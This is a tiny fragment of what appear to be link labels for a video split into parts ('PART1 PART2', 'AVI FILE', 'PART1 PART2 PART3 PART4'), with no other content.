
PART1 PART2 


AVI FILE


PART1 PART2 PART3 PART4